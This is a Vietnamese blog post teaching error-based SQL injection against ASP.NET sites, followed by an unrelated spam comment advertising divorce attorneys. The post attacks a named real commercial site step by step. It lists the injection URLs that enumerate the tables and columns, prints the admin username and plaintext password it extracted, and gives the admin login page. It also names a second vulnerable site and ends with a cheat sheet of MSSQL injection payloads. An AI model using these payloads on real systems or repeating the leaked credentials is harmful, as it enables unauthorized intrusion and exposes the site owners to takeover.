Trang chủ
»
SQL Injection
» sqli aspx
15 thg 8, 2015
sqli aspx
Victim: http://quangcaovinasun.com.vnBước 1: Check link lỗi
Đối với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi:
Unclosed quotation mark after the character string ''
Chứng tỏ site dính lỗi SQLI.
Ví dụ: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’
Bước 2: Truy vấn tên các table
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
Xuất hiện thông tin tên table thứ nhất: “tbl_DangNhap”.
Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.
Tiếp tục truy vấn:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')))-- -
Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.
Tiếp tục,
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap','tbl_DiaChi' )))-- -
Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.
Làm tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở site này table chứa thông admin đăng nhập của admin là table đầu tiên: Tbl_DangNhap
Bước 3 : Truy vấn tên các columns
Như thông tin khai thác được ở trên. Table chứa thông tin username và password chính là table: tbl_DangNhap. Chính vì vậy ta sẽ khai thác table này.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- -
Conversion failed when converting the nvarchar value 'ID' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- -
Conversion failed when converting the nvarchar value 'TenDN' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- -
Conversion failed when converting the nvarchar value 'Matkhau' to data type int.
Bước 4: Khai Thác thông tin username và password
- Thông tin username:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN from tbl_DangNhap))-- -
Conversion failed when converting the nvarchar value 'loimv' to data type int.
- Thông tin password
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 Matkhau from tbl_DangNhap))---
Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int
- Hoặc get cả username và passwordhttp://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN%2b'/'%2bMatkhau from tbl_DangNhap))-- -
Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int
Bước 5: Tìm link admin và đăng nhâp
Sử dụng tool havij hoặc web admin finder, đã được giới thiệu ở bài 2:
http://ducdung08clc.blogspot.com/2012/03/v-behaviorurldefaultvmlo.html
Ta được link admin:
http://quangcaovinasun.com.vn/admin/Default.aspx
admin: loimv
password: maihoanglinh@
Site khai thác tương tự:
http://www.sacotour.vn/Chi-tiet-tour.aspx?idtour=88
Kết Luận Các Query SQLI Trong Aspx Cần Lưu Ý
1- Get the version:
and 1=convert(int,@@version)-- -
2- Get Server Name
and 1=convert(int,@@servername)-- -
3- Get data base name:
and 1=convert(int,db_name())-- -
4- Get system user
and 1=convert(int,system_user) -- -
5- Get table thứ nhất
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
6- Get table thứ 2:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -
7- Get table thứ 3 :
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -
8- Get đến table user để lấy thông tin đăng nhập của admin
10 - Get column thứ nhất từ table chứa admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -
11- Get column thứ nhất từ table chứa admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")
and column_name not in ("FIRST-COLUMNS-HERE")))-- -12- Get cho hết các columns cần lấy thông tin
13- Xuất ra thông tin username và password
and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -
1 nhận xét:
Yet again, whenever kids are involved, the emotions are even increased as well as uncooked, therefore knowing someone who's aim might help ensure your and your kid's needs are supported. It's also great for have someone to help you view the procedure and the way it works as well as keeps an individual grounded along the route. Efficiency is an additional reason to employ a divorce attorney.
virginia divorce attorney
Being in this specific particular industry, your current attorney can also be very knowledgeable about your family court idol judges along with other divorce law firms who may be which represents your own soon-to-be-ex-spouse. That understanding types a much more participating doing work romantic relationship, which assists slowly move the process along at the same time. Moreover, should you be managing the situation with out a divorce attorney, there is a larger possibility in which feelings might impede as well as end up hindering the procedure and so that it is continue a lot longer as just about every problem, large and small, becomes a difficult wrestle and battle.
Đăng nhận xét